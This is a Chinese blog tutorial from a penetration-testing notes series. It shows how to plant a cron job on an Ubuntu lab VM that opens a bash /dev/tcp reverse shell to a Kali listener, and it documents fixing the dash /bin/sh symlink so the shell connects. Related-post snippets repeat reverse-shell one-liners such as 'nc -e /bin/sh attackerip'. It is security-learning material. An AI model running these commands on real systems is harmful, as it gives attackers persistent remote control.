ubuntu计划任务反弹shell

最新推荐文章于 2024-09-18 15:07:33 发布
最新推荐文章于 2024-09-18 15:07:33 发布
阅读量2.5k 收藏 4
点赞数
分类专栏: web渗透学习笔记 linux操作系统
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35569814/article/details/101855239
版权

实验环境

ubuntu 14.04 x64位:192.168.1.115

kali/win10:192.168.1.108/107

所用工具:netcat(瑞士军刀)

计划任务

至于计划任务是什么我觉大不需要太多解释,就是定时执行任务的意思那么接下来看看计划任务的格式,以及书写

crond 是linux用来定期执行程序的命令,如果未安装需要先安装,不在多说

cron服务提供crontab命令来设定cron服务的,以下是这个命令的一些参数与说明:

  • crontab -u //设定某个用户的cron服务,一般root用户在执行这个命令的时候需要此参数
  • crontab -l //列出某个用户cron服务的详细内容
  • crontab -r //删除没个用户的cron服务
  • crontab -e //编辑某个用户的cron服务

我们使用crontab -e编辑的文件都被保存在 /var/spool/cron目录中。其文件名与用户名一致(redis里面命名的root)

基本语法

分      小时     日       月      星期      命令

0-59   0-23   1-31   1-12     0-6     command     (取值范围,0表示周日一般一行对应一个任务)

SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed

前四行是用来配置crond任务运行的环境变量

  • 第一行SHELL变量指定了系统要使用哪个shell,这里是bash
  • 第二行PATH变量指定了系统执行命令的路径
  • 第三行MAILTO变量指定了crond的任务执行信息将通过电子邮件发送给root用户,如果MAILTO变量的值为空,则表示不发送任务执行信息给用户
  • 第四行的HOME变量指定了在执行命令或者脚本时使用的主目录

反弹shell

bash -i >& /dev/tcp/IP/PORT 0>&1

要想了解“>&”和“0>&1”,首先我们要先了解一下Linux文件描述符和重定向。

linux shell下常用的文件描述符是:

  • 标准输入   (stdin) :代码为 0 ,使用 < 或 << 
  • 标准输出   (stdout):代码为 1 ,使用 > 或 >> 
  • 标准错误输出(stderr):代码为 2 ,使用 2> 或 2>>

命令解释

  • bash -i: -i(interactive)。即产生一个交互式的shell(bash)
  • /dev/tcp/IP/POR:接单理解就可以是连接IP上的PORT端口,具体意思-->>/dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。同理,Linux中还存在/dev/udp/
  • 在这里&并不是and的意思,在c或者C++中,&是取地址符。>&和&<是一个意思,把...定向到.....;>&和2>&1是一个意思就是把标准错误输出定向到标准输出中,0>&1就是把标准输入定向到标准输出中

参考文章:https://blog.csdn.net/deeplearnings/article/details/77367695

本地测试

通过ssh连接两台虚拟机

在kali中开启监听,这里我们随便选一个端口,大于1000的-->>6666端口

在Ubuntu中写入计划任务,使用crontab -e直接编辑

* * * * * bash -i  >& /dev/tcp/192.168.1.109/6666 0>&1

切换到root用户查看,发现crontabs目录下多了一个qiushui文件,这里是因为我刚才是用qiushui用户登陆的,如果可以拿到shell,也是此用户的shell,但是并没有反弹成功

接下来,查看一下Ubuntu这边的日志:tail -f /var/log/syslog

经过查阅资料

Ubuntu系统默认会将计划任务的错误信息以邮件的方式发送给用户,但是由于Ubuntu系统默认没有安装邮件系统,所以真正的报错信息并不是No MTA installed,discarding output这句话

想看到真正的报错信息有两种解决办法:

  • 安装邮件系统
  • 将计划任务的错误信息输出到一个文件内

我们选择第二种,接下来修改一下计划任务,让他输出到一个文件内

* * * * * bash -i  '>& /dev/tcp/192.168.1.109/6666 0>&1'>/tmp/error.txt 2>&1

大概需要等一分钟左右,接下来我们去查看error文件

  • 第一行:无法设定终端进程组
  • 第二行:此shell中无任务控制
  • 第三行:没有这个文件或目录

这条错误的意思说/bin/bash没有被找到,linux里面的cron中command执行的shell环境是/bin/sh,接下来我们看看ubuntu的bin/sh文件

ls -l | grep -w 'sh'

可以看到/bin/sh 文件实际上是一个软链接文件,他指向的是dash这个shell

而实际上dash这个shell只有运行脚本的能力,而没有交互能力。

这里我们只需要将修改sh的软链接为bash即可

ln -s -f bash /bin/sh

解决完问题我们把计划任务修改回来,成功反弹

秋水sir
关注
专栏目录
Ubuntu使用crontab使用反弹shell问题处理
SHELLCODE_8BIT的博客
12-15 903
原因是在ubuntu下crontab启动默认使用dash来启动,而在dash启动会失败,我们可以来尝试一下。使用dash启动,会直接报如下错误。在ubuntu环境下做攻击时,会遇到下列情况,使用crontab写入如下命令反弹,会失败。ubuntu反弹SHELL正确用法是。
2021-8-1Redis计划任务反弹shell
qq_45290991的博客
08-01 2305
前段时间忙着毕业,终于现在毕业了,在愉快而紧张地等待毕业前期,我开始了Redis的学习。。。 一、搭建安装配置Redis数据库 我听说在centOS下可以Redis结合计划任务反弹shell成功,Ubuntu貌似不行 ...
反弹Shell,看这一篇就够了
Appleteachers的博客
04-24 1308
前言 在渗透测试实战,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
网络安全-shire写任务计划、反弹shell、写私钥、反序列化
最新发布
m0_68976043的博客
09-18 678
我们经过前面文章很清楚知道,shiro是将数据存储在内存当,内存落盘实现一个数据存储,而当其结合python,python将登录的session存储到shiro里面就会造成一个反序列化漏洞看看环境登录信息存到session序列化一个引擎序列化存入那我们就需要反序列化的方式取出pass:python序列化的两个方法pickle.dumps、pickle.loads。
Ubuntu计划任务反弹shell
18年3月萌新白帽子
08-19 4247
首先介绍一下实验环境 1.被攻击者:Ubuntu 192.168.0.8 2.攻击者:kali  192.168.0.127   首先第一步在Ubuntu系统下添加crontab 计划任务 * * * * * bash -i  &gt;&amp; /etc/tcp/192.168.0.127/8888 0&gt;&amp;1   第二步在kali系统下使用nc命令监听8888端口...
ubuntu任务计划反弹shell
m0_65540912的博客
06-30 460
在实现的过程,发现ubuntu靶机没有nc,无法用nc命令执行反弹的命令,而且执行计划任务的用户是什么,反弹过去的用户是一样的。
实现ubuntu任务计划反弹shell
m0_65522694的博客
07-02 389
也就是说linuxcron的命令执行的shell环境是/bin/sh 查看后发现,sh指向dash的软连接,由于dash的shell是没有交互能力的,所以将sh的软连接修改为bash。作用:是将一个交互式的bash shell的输出和错误发送到kali的8888端口,并将输入也从该端口读取。在ubuntu的系统使用crontab -e命令编写计划任务。使用tail -f /var/log/syslog查看日志。然后居然不存在这个文件夹 /bin/bash。使用Ubuntu定时任务反弹shell
Ubuntu计划任务反弹shell提权
Longwaer
01-03 1750
学习Ubuntu计划任务反弹shell原理,了解掌握Linux提权新技巧。
redis写任务计划反弹shell
09-15
根据提供的引用内容,Redis可以通过计划任务反弹shell。具体步骤如下: 1. 在Redis服务器上创建一个计划任务。可以使用CRON表达式来指定计划任务的执行时间。 2. 在计划任务编写一段脚本,用于反弹shell到黑客...
反弹shell与生成shell
专注企业信息安全-sec
12-04 969
反弹shell 0x01 bash 版本: bash -i >& /dev/tcp/attackerip/1234 0>&1 注意这个是由解析 shellbash 完成,所以某些情况下不支持。我用 zsh 不能反弹。这个也是最常用的。 0x02 nc 版本: 支持 - e 选项 nc -e /bin/sh attackerip 1234 这个方式最...
别再头疼反弹Shell失败了,这篇文章带你找到问题根源
vivlol918的博客
09-01 1676
例如,如果目标系统的防火墙只允许80端口(HTTP)和443端口(HTTPS)的流量通过,而你尝试使用其他端口进行反弹shell,那么连接将被阻止,导致失败。
ubuntu的redis反弹shell总结
qq_15042405的博客
02-25 1398
ubuntu的redis反弹shell总结 ubuntu要执行有三点: 1、ubuntu的默认执行命令的为/bin/dash,我们使用bash -i肯定是弹不了的。 2、ubuntu计划任务运行有语法要求,redis写入的文件存在缓存数据,导致语法错误无法运行计划任务。 3、文件需要是600 rw权限,权限不对也不能运行,不过我直接写入貌似就是600 rw。 参考链接:http://www.vkxss.top/2019/05/28/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-R
linux shell 提示 bash: no job control in this shell
热门推荐
whatday的专栏
01-19 1万+
当我们从shell, 启动一个跑在另外一个tty的shell时将会碰到这个提示。 最常见的是, shell直接把/dev/console作为它的标准输入输出。比如 gentoo, arch使用硬盘安装大法, 但是却找不到硬盘是, 它会自动启动一个shell, 这个shell就是没有job control的了。 至于原因, 涉及的内容比较多, 所以我就不想在这里作详细的分析了。想深入了解的话, 自己...
[Linux] 进程控制
giturtle's blog
04-08 581
进程控制进程终止(进程退出)进程等待程序替换 前面博客讲解了进程控制的一小部分:进程创建。 下面开始其他部分内容总结: 进程终止(进程退出) [man 2]:系统调用手册 [man 3]:库函数手册 main函数 return 或者 exit 才是终止进程 exit:库函数 _exit:系统调用函数 所以实际是exit调用了_exit系统函数 ●在main函数r...
linux 对设备不适当的ioctl操作,似乎对设备的直接操作只有ioctl函数了
weixin_35377028的博客
05-06 4772
在命令行调用设备的ioctl函数。在Linux系统,似乎对设备的直接操作只有ioctl函数了。他接受的参数不是太多,而且都是一一对应的。blockdev - 从命令行调用区块设备控制程序blockdev [options] commands devicesblockdev 工具允许从命令行调用区块设备控制程序。–setro 设置设备为只读–getro 读取设备是否为只读(成功为1,0则为可读写)...
使用Ubuntu和kali来实现Tcp劫持和反弹Shell攻击(从零开始实验)
鹤不归十九的博客
11-20 2465
Tcp劫持和反弹Shell攻击实验(从零开始)
AWS部署报错cannot set terminal process group (-1): Inappropriate ioctl for device
studyvcmfc的专栏
07-20 1210
test_X = pd.concat([pd.DataFrame(test_X_len), pd.DataFrame(test_X)], axis=1) # We split the data into chunks and send each chunk seperately, accumulating the results. def predict(data, rows=512): split_array = np.array_split(data, int(data.shape[0...
shell任务控制
luosimuer
07-31 1497
shell任务控制的一些术语: (1)前台任务:在shell运行,任务完成前shell提示符不会出现,因而不能同时运行其他任务 (2)后台任务:在shell运行,但不独占shell任务完成前shell提示符就能出现,因而可以在同一个shell下同时运行其他任务 (3)暂停:临时停止执行前台任务 (4)恢复:让暂停的任务继续执行 下面是一些常用命令: (1)jobs:列出shell
本地运行yarn实现wordcount报错Exit code: 1 Exception message: /bin/bash: 第 0 行:fg: 无任务控制 Stack trace: ExitCo
小白虫的博客
07-17 4379
eclipse控制台输出错误信息 Container id: container_1531823680410_0003_02_000001 Exit code: 1 Exception message: /bin/bash: 第 0 行:fg: 无任务控制 Stack trace: ExitCodeException exitCode=1: /bin/bash: 第 0 行:fg: 无任务控制...
shell任务控制
weixin_34194702的博客
02-11 106
http://linux.cn/article-2680-1.html   你的 shell 会留有一张当前作业的表单,称为作业表。当你键入命令时,shell 会给它分配一个 jobID(也称作 JOBSPEC)。一个 jobID 或 JOBSPEC只是很小的整数数值。[root@250-shiyan prog]# vi w &amp;[1] 21842[root@250-shiyan pro...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值